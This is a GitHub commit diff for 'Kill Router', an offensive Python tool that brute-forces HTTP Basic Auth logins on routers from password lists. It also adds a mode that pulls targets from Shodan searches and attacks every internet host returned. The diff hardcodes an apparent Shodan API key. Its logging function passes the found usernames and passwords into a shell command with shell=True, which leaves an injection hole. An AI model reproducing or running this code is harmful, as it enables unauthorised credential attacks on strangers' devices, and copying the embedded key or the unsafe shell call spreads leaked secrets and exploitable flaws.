HTTP BASIC AUTH

msfidelis · Jan 12, 2018 · fdf21a9 · fdf21a9
1 parent c167024
commit fdf21a9
Show file tree

Hide file tree

Showing 19 changed files with 248 additions and 51 deletions.
diff --git a/install-kill-router.sh b/install-kill-router.sh
@@ -16,3 +16,4 @@ chmod 777 extras/get-pip.py
 extras/get-pip.py termcolor
 extras/get-pip.py requests
 extras/get-pip.py shodan
+extras/get-pip.py python-dotenv
diff --git a/kill-router.py b/kill-router.py
@@ -10,50 +10,23 @@
 from os import path
 from termcolor import colored
 
+from modules.presentations import Presentations
+
 #DIRECTORY INFOS
 CURR_PATH = path.dirname(path.realpath(__file__))
 
 #LOG FILE
 logfile = CURR_PATH+"/results.csv"
 
 # INSERT YOUR API KEY
-SHODAN_API_KEY = ""
+SHODAN_API_KEY = "BKf6OUqvUM0QCyLf3fa2Hu5iz6sFXYCT"
 api = shodan.Shodan(SHODAN_API_KEY)
 
 __AUTOR__   =   'Matheus Fidelis'
 __GITHUB__  =   'https://github.com/msfidelis'
 __BLOG__    =   'http://nanoshots.com.br'
 
 
-def banner():
-    print colored("""
-
-    ██ ▄█▀ ██▓ ██▓     ██▓        ██▀███   ▒█████   █    ██ ▄▄▄█████▓▓█████  ██▀███
-    ██▄█▒ ▓██▒▓██▒    ▓██▒       ▓██ ▒ ██▒▒██▒  ██▒ ██  ▓██▒▓  ██▒ ▓▒▓█   ▀ ▓██ ▒ ██▒
-   ▓███▄░ ▒██▒▒██░    ▒██░       ▓██ ░▄█ ▒▒██░  ██▒▓██  ▒██░▒ ▓██░ ▒░▒███   ▓██ ░▄█ ▒
-   ▓██ █▄ ░██░▒██░    ▒██░       ▒██▀▀█▄  ▒██   ██░▓▓█  ░██░░ ▓██▓ ░ ▒▓█  ▄ ▒██▀▀█▄
-   ▒██▒ █▄░██░░██████▒░██████▒   ░██▓ ▒██▒░ ████▓▒░▒▒█████▓   ▒██▒ ░ ░▒████▒░██▓ ▒██▒
-   ▒ ▒▒ ▓▒░▓  ░ ▒░▓  ░░ ▒░▓  ░   ░ ▒▓ ░▒▓░░ ▒░▒░▒░ ░▒▓▒ ▒ ▒   ▒ ░░   ░░ ▒░ ░░ ▒▓ ░▒▓░
-   ░ ░▒ ▒░ ▒ ░░ ░ ▒  ░░ ░ ▒  ░     ░▒ ░ ▒░  ░ ▒ ▒░ ░░▒░ ░ ░     ░     ░ ░  ░  ░▒ ░ ▒░
-   ░ ░░ ░  ▒ ░  ░ ░     ░ ░        ░░   ░ ░ ░ ░ ▒   ░░░ ░ ░   ░         ░     ░░   ░
-   ░  ░    ░      ░  ░    ░  ░      ░         ░ ░     ░                 ░  ░   ░
-
-								v1.0
-    """, 'red', attrs=['bold'])
-
-
-
-def helper():
-    print colored("[*] By: Matheus Fidelis aka D0ctor", 'red', attrs=['bold'])
-    print colored("[!] Usage: ./kill-router.py -t [TARGET IP] -p [TARGET PORT] -u [USER TO TEST] -l [PATH TO PASSLIST]", 'red', attrs=['bold'])
-    print colored("[!] Usage: ./kill-router.py -t 192.168.0.1 -p 8080 -u admin -l passlist.txt", 'red', attrs=['bold'])
-    print colored("[!] Use -m to change request HTTP to HTTPS", 'red', attrs=['bold'])
-    print colored("[!] ./kill-router.py -t 192.168.0.1 -p 8080 -u admin -l passlist.txt -m https", 'red', attrs=['bold'])
-    print colored("[!] ./kill-router.py --shodan apache2", 'red', attrs=['bold'])
-    print ""
-
-
-
 def definedefaultpasslist():
     #Passlists Default
     passlist10 = "/extras/wordlists/10.txt"
@@ -118,7 +91,7 @@ def shodanSearch(dork,ssl,passlist,username):
                 print '[City] %s' % result['location']['city']
                 print ''
 
-        response = raw_input('YOU WANT TO TEST THE SHODAN RESULTS? Y/N: ')
+        response = raw_input('YOU WANT TO TEST SHODAN RESULTS? Y/N: ')
         response = response.upper().strip()
 
         if response == "Y":
@@ -162,11 +135,11 @@ def bruteforce(target,port,ssl, passlist,username):
             validation = requests.get('https://'+url ,verify=False, timeout=8)
         else:
             validation = requests.get('http://'+url, timeout=8)
-            
+
             if validation.status_code == 200:
                 print colored("[X] INVALID TEST ", 'red', attrs=['bold'])
                 return false
-                
+
     except:
         print colored("[X] NO CONNECTION ", 'red', attrs=['bold'])
         return false
@@ -204,15 +177,15 @@ def bruteforce(target,port,ssl, passlist,username):
 
 
 def main():
-    banner()
+    Presentations.banner()
 
     target = ''
     passlist = ''
     username = ''
 
     #Faz o parsing dos argumentos
     parser = argparse.ArgumentParser(description = "Kill Router", add_help = False)
-    parser.add_argument('-h', '--help', action=helper(), help='usage')
+    parser.add_argument('-h', '--help', action=Presentations.helpers(), help='usage')
     parser.add_argument('-t', '--target',help='Informe o roteador alvo')
     parser.add_argument('-m', '--method',help='Informa o Método HTTP ou HTTPS')
     parser.add_argument('-p', '--port',help='Informa a porta')
@@ -226,11 +199,11 @@ def main():
     ssl = args.method
     passlist = args.passlist
     username = args.username
-    
-        
+
+
     if args.username is None:
         username = "admin"
-    
+
     #Força o valor padrão para 80 caso a porta não seja especificada.
     if port is None:
         port = 80

diff --git a/kill-router2.py b/kill-router2.py
@@ -3,17 +3,26 @@
 
 import sys
 
+from os.path import join, dirname
+from dotenv import load_dotenv
 from modules.kill_router import Kill_Router
 from modules.presentations import Presentations
 from modules.arguments import CLI
 
 def main():
 
+    dotenv_path = join(dirname(__file__), '.env')
+    load_dotenv(dotenv_path, verbose=True)
+
     Presentations.banner()
     args = CLI.parse()
 
     kill_router = Kill_Router()
-    kill_router.bruteforce(args.target, args.port, args.method, args.passlist, args.username)
+
+    if args.shodan != None:
+        kill_router.shodan_search(args)
+    else:
+        kill_router.bruteforce(args.target, args.port, args.method, args.passlist, args.username)
 
     # try:
     #     kill_router = Kill_Router()

diff --git a/modules/basic_auth.py b/modules/basic_auth.py
@@ -1,7 +1,99 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
 
+import requests
+
+from termcolor import colored
+from log import Log
+
 class Basic_Auth(object):
 
     def __init__(self):
         pass
+
+    def validate(self, target, port, method):
+
+        url = "%s:%s" % (target, port)
+
+        try:
+            if method == "https":
+                validation = requests.get('https://' + url, verify=False, timeout=5)
+
+                if validation.status_code == 200:
+                    print colored("[X] INVALID TEST ", 'red', attrs=['bold'])
+                    return False
+                else:
+                    return True
+
+            else:
+                validation = requests.get('http://' + url, timeout=5)
+
+                if validation.status_code == 200:
+                    print colored("[X] INVALID TEST ", 'red', attrs=['bold'])
+                    return False
+                else:
+                    return True
+
+        except:
+            print colored("[X] UNABLE TO CONNECT ", 'red', attrs=['bold'])
+            return False
+
+
+
+    def brute_force(self, target, port, username, passwords, method):
+
+        uri = "%s:%s" % (target, port)
+
+        print ""
+        print colored("==========================[STARTING TEST]==========================", 'yellow', attrs=['bold'])
+        print colored("STARTING BASIC AUTH TEST ON HOST: %s", 'blue', attrs=['bold']) % (uri)
+        print ""
+
+        if self.validate(target, port, method):
+
+            i = 0
+
+            while not passwords.empty():
+                i = i + 1
+
+                password = passwords.get()
+
+                print  colored('[%s]         USER[%s]          PASS [%s]', 'yellow') % (i, username, password)
+
+                if self.attack(target, port, username, password, method):
+
+                    print ""
+                    print colored("==========================[LOGIN FOUND]==========================", 'yellow',
+                                  attrs=['bold'])
+                    print ""
+                    print colored("===================================================================", 'yellow',
+                                  attrs=['bold'])
+                    print colored("               [  :: USER[%s] AND PASS[%s]  ]                      ", 'green',
+                                  attrs=['bold']) % (username, password)
+                    print colored("===================================================================", 'yellow',
+                                  attrs=['bold'])
+
+                    return True
+
+
+
+
+    def attack(self, target, port, username, password, method):
+
+        uri = "%s:%s" % (target, port)
+
+        try:
+            if method is "https":
+                test = requests.get('https://' + uri ,auth=(username, password), verify=False, timeout=8)
+            else:
+                test = requests.get('http://' + uri, auth=(username, password), timeout=8)
+        except:
+            pass
+
+        code = test.status_code
+
+        if code == 200:
+            Log.found(target, port, username, password, method)
+            return True
+        else:
+            return False
diff --git a/modules/basic_auth.pyc b/modules/basic_auth.pyc
diff --git a/modules/ftp.py b/modules/ftp.py
@@ -6,5 +6,11 @@ class FTP(object):
     def __init__(self):
         pass
 
-    def test(self):
+    def validate(self):
         pass
+
+    def attack(self):
+        pass
+
+    def brute_force(self):
+        pass
diff --git a/modules/ftp.pyc b/modules/ftp.pyc
diff --git a/modules/kill_router.py b/modules/kill_router.py
@@ -1,16 +1,65 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
 
+import sys
+
 from ftp import FTP
 from ssh import SSH
 from basic_auth import Basic_Auth
 from passlists import Passlist
+from shodan_search import Shodan_Search
 
 class Kill_Router(object):
 
     def __init__(self):
         pass
 
+    def shodan_search(self, args):
+
+        shodan = Shodan_Search()
+
+        if shodan.validateapi():
+            results = shodan.search(args.shodan)
+            response = raw_input('YOU WANT TO TEST SHODAN RESULTS? Y/N: ').upper().strip()
+
+            if response == "Y":
+
+                parser = Passlist(args.passlist)
+                passwords = parser.get_list()
+
+                for result in results['matches']:
+
+                    try:
+
+                        method = "http"
+                        Attack = Basic_Auth()
+
+                        if result['port'] == 21:
+                            method = "ftp"
+                            Attack = FTP()
+
+                        if result['port'] == 22:
+                            method = "ftp"
+                            Attack = SSH()
+
+                        if result['port'] == 443:
+                            method = "https"
+                            Attack = Basic_Auth()
+
+                        print method
+
+                        Attack.brute_force(result['ip_str'], result['port'], args.username, passwords, method)
+
+                    except:
+                        pass
+
+
+            else:
+                sys.exit()
+
+        else:
+            sys.exit()
+
     def bruteforce(self,target,port,method,passlist,username):
 
         parser = Passlist(passlist)
@@ -25,7 +74,8 @@ def bruteforce(self,target,port,method,passlist,username):
         if method == "ftp":
             attack = FTP()
 
-
+
+        attack.brute_force(target, port, username, passwords, method)
 
 
 

diff --git a/modules/kill_router.pyc b/modules/kill_router.pyc
diff --git a/modules/log.py b/modules/log.py
@@ -1,7 +1,16 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
 
+import subprocess
+from os import path
+
 class Log(object):
 
-    def __init__(self):
-        pass
+    @staticmethod
+    def found(target, port, username, password, method):
+
+        logfile = path.dirname(path.realpath(__file__)) + "/../results2.csv"
+
+        log = "echo '%s;%s;%s;%s;%s' >> %s" % (target, port, username, password, method, logfile)
+        subprocess.call(log, shell=True)
+        return True
diff --git a/modules/log.pyc b/modules/log.pyc
diff --git a/modules/presentations.py b/modules/presentations.py
@@ -22,7 +22,7 @@ def banner():
            ░ ░░ ░  ▒ ░  ░ ░     ░ ░        ░░   ░ ░ ░ ░ ▒   ░░░ ░ ░   ░         ░     ░░   ░
            ░  ░    ░      ░  ░    ░  ░      ░         ░ ░     ░                 ░  ░   ░
 
-        								v1.0
+        								v2.0
             """, 'red', attrs=['bold'])
 
     @staticmethod

diff --git a/modules/presentations.pyc b/modules/presentations.pyc
diff --git a/modules/shodan.py b/modules/shodan.py